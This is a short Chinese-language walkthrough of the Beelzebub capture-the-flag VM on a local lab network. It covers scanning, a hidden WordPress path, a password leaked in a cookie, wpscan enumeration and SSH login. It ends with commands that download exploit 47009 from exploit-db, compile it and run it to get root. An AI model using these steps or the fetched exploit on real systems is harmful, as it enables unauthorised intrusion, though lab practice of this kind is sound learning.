Beelzebub靶机练习
下载靶机
网络选择桥接模式,kali也为桥接
主机扫描
nmap 192.168.43.1/24
80端口
扫描目录
dirsearch -u http://192.168.43.181
找到的能访问的页面,依次访问看看都是什么
在查看index.php时,发现404 但我们扫描到是200
查看页面源代码
要我们把beelzebub进行md5加密
d18e1e22becbd915b45e0e655429d487
将加密后的拼接到网址后面,再扫描一次
发现在uploads目录的talk to valak的cookie里面发现一个password
在这个页面,任意提交一个数据,会在cookie中出现密码字段的数据
使用wpscan扫描一下看是否存在可利用漏洞
wpscan --url=http://192.168.43.181/d18e1e22becbd915b45e0e655429d487/ --ignore-main-redirect --force -e --plugins-detection aggressive
进行连接
ssh krampus@192.168.43.181
列出的文件中有历史命令文件,查看一下
有提权命令,我们也执行一下
依次执行
wget https://www.exploit-db.com/download/47009
mv 47009 ./exploit.c
gcc exploit.c -o exploit
./exploit
提权到root